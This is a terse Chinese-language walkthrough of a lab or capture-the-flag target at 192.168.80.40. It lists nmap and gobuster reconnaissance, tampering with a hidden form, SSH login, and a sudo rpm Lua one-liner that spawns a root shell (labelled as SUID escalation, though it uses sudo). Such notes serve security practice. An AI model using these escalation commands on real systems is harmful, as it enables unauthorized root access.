知识点
rpm SUID提权
主机发现
netdiscover
端口扫描
nmap -A -T5 192.168.80.40
站点目录爆破
gobuster dir -u http://192.168.80.40 -w /usr/share/wordlists/dirb/big.txt -t50 -q
- 信息收集
http://192.168.80.40/sitemap.xml
http://192.168.80.40/index.htnl
发现隐藏表单,删除hidden字段页面显示表单
输入任意数值,页面跳转,提示切换请求方法
更改表单为post方法
- 获取密码
提权
ssh isw0@192.168.80.40
- SUID提权
sudo -l
sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
END